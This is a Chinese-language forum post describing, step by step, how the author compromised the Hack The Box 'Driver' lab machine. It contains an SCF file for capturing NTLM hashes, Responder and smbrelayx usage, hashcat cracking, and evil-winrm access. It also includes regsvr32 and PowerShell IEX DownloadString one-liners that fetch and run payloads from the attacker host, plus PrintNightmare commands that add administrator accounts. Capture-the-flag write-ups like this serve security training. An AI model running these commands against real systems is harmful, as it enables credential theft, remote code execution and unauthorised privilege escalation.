本帖最后由 zhaorong 于 2022-11-29 17:42 编辑
0x00 简述
靶场来自Hack The Box 的 Driver,本文章详细记录了拿下靶机的全部流程和知识点
分别用到了SMB中继攻击—SCF文件攻击、WinRM反弹shell利用以及提权
靶场是你的就是你的不是你的就不要勉强你说是吧?
0x01 初探
Nmap扫描给定靶机
nmap -sC -sV -T4 --min-rate 1000 10.10.11.106
可以看到开启了SMB服务
Nmap加载脚本检测一下有没有基本漏洞
nmap -p 445 --script smb-vuln* 10.10.11.106
没有
看看web的端口
需要登陆
弱口令admin admin登陆成功
可以看到是一个打印机固件升级功能
并且有一个上传点
经过反复测试,对上传的文件没有任何限制,但是没有返回路径,无法直接利用
那么我们可以利用SMB服务来搞些事情,即
SCF文件攻击
具体原理我会在另一篇文章里详细阐述
0x02 SCF文件攻击
基本原理:SCF(shell命令文件)文件可用于执行一组有限的操作,一个SCF文件可以用来访问一个特定的UNC路
径允许渗透测试人员构建攻击。下面的代码可以被放置在一个文本文件中,然后需要被植入到网络共享。
先制作SCF文件,内容如下:
[Shell]Command=2
IconFile=\\10.10.16.13\share\a.ico
[Taskbar]
Command=ToggleDesktop
将文件命名为@xxx.scf
@符号可以让文件保持在共享文件列表顶端
上传之前先准备好接受端,来接受被攻击端的NTLM Hash
接受Hash这里提供两种方法,一种是利用MSF,另一种是利用Rsponder
MSF:
利用 auxiliary/server/captrue/smb模块来捕获
设置好相关参数并启动
上传准备好的scf文件
这时MSF接收端就可以接收到NTLMv2 Hash了
同样的在后期利用时也可以用这个原理来获取NTLMv2 Hash
通过快捷方式
例如这样,起SMB中继服务就能获取到NTLMv2 Hash
Responder:
Responder需要使用以下命令运行来捕获浏览共享的用户的NTLMv2 Hash
responder -wrf --lm -v -I eth0
root@VM-4-4-ubuntu:/Responder-master$ python2 Responder.py -wrf --lm -v -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 2.3
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CRTL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [ON]
Fingerprint hosts [ON]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.13]
Challenge set [1122334455667788]
[!] Error starting TCP server on port 80, check permissions or other servers running.
[+] Listening for events...
[+] Exiting...
root@VM-4-4-ubuntu:/Responder-master$ service httpd stop
Failed to stop httpd.service: Unit httpd.service not loaded.
root@VM-4-4-ubuntu:/Responder-master$ service apach2 stop
Failed to stop apach2.service: Unit apach2.service not loaded.
root@VM-4-4-ubuntu:/Responder-master$ service apache2 stop
root@VM-4-4-ubuntu:/Responder-master$ python2 Responder.py -wrf --lm -v -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 2.3
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CRTL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [ON]
Fingerprint hosts [ON]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.13]
Challenge set [1122334455667788]
[+] Listening for events...
0x03 利用SCF文件攻击直接在MSF获取shell
首先用msfvenom生成后门文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=5555 -f exe > shell.exe
Coresecurity已经发布了一个名为Impacket的Python脚本,可以对SMB等Windows协议执行各种攻击。
我们可以使用smbrelayx 这个python脚本可以设置中继攻击并在当目标主机尝
试连接SMB服务器时提供有效载荷。
这个载荷将自动执行,因为SCF文件将强制每个用户使用他们自己的凭据连接到一个不存在的共享。
python smbrelayx.py -h Target-IP -e ./shell.exe
然后启动MSF的监听等待回连
注意!!受害者服务器必须是管理员权限,否则负载将不会正常执行
我这里反复尝试后失败了,中继服务没有收到请求,原因暂时未知
但这个手法是可行的
顺带一提,MSF其实提供了这个功能,使用的是 exploit/windows/smb/smb_relay模块
但是这个模块仅支持NTLMv1,这里就不再演示
现在的系统版本都已经默认使用NTLMv2
但是如果能碰到老版本的系统或者系统进行了错误配置,还是可以利用的
0x04 破解 NTLMv2 Hash
首先将获取到的Hash进行破解
利用 echo 和 > 把NTLMv2 Hash 写进文件hash
然后利用hashcat破解
hashcat -m 5600 hash --wordlist /usr/share/wordlists/rockyou.txt
0x05 WinRM反弹shell
手法一:
利用 Hackplayers开源的 evil-winrm获取 shell
KALI使用命令gem install evil-winrm可以安装并且自动安装依赖
evil-winrm -i 10.10.11.106 -u “tony” -p “liltony”
成功获取到shell
接着使用MSF exploit 中的 multi/script/web_delivery模块上线
准备完成,在shell中执行最后给出的命令(发布文章时r和32连在一起被判定为敏感词,所以加了个星号)
regsvr*32 /s /n /u /i:http://10.10.16.13:8888/3Cni6iy5.sct scrobj.dll
成功上线
找到了第一个flag
0x06 提权
进入Meterperter并进入交互式shell先初步的了解一下情况
可以看到当前用户并非管理员用户,并且没有权限查看文件内容,那么势必需要提权
先把Meterpreter迁移到稳定的进程中
尝试getsystem不成功
也没有高权限的用户进程,无法使用令牌窃取
使用 post/multi/recon/local_exploit_suggester模块检测提权漏洞
但结果都失败了
查看一下有什么服务
可以看到有个很眼熟的服务,这个服务近段时间貌似出了几个远程代码执行、提权的漏洞
搜索一下得到漏洞编号 CVE-2021-34527 以及 CVE-2021-1675
先尝试一下CVE-2021-34527:
我使用的是powershell版本的exp,放上链接
https://github.com/JohnHammond/CVE-2021-34527
那就直接用Evil-WinRM获取的shell来执行吧,这个获取的shell正好也是powershell的
由于权限和powershell执行策略的限制
这里使用远程加载的方式执行exp
命令如下
IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.13:8000/CVE-2021-34527.ps1')
然后执行
Invoke-Nightmare
可以看到添加了用户 adm1n并且将其加入了Adminitrators组中
密码为P@ssw0rd
CVE-2021-1675:
IEX(New-Object Net.WebClient).DownloadString('[http://10.10.16.13:8000/CVE-2021-16
75.ps1](http://10.10.16.13:8000/CVE-2021-34527.ps1)')
如果直接执行Invoke-Nightmare添加的用户和上一个脚本是一样的,为了区分,使用以下命令添加用户
Invoke-Nightmare -DriverName "Chr1sto" -NewUser "chr1sto" -NewPassword "chr1sto"
添加了chr1sto并加入用户组
0x07 收尾
到此目前为止,我们已经拿到了这台机器的管理员权限,整个流程基本完成
接下来只需要登陆新建的用户,去读取flag就好了
我们依然使用Evil-WinRM来获取新用户的shell即可
可以看到当前用户的信息如下
读一下flag
0x08 总结
靶场是好靶场,整个流程的逻辑非常严密
渗透的过程中做了一些无用的尝试,浪费了许多的时间,比如MSF派生CobaltStrike session
也因为环境的问题,额外做了很多的工作
但渗透的过程不就是在不停的尝试吗 |
楼主